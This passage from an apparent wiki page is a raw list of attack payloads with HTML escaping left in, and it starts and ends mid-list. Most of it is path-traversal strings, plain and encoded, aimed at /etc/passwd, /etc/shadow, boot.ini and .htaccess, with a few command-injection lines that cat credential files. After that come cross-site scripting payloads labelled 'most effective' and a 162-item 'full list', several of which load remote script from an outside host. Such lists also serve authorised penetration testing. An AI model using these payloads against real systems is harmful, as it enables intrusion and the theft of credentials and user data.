%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
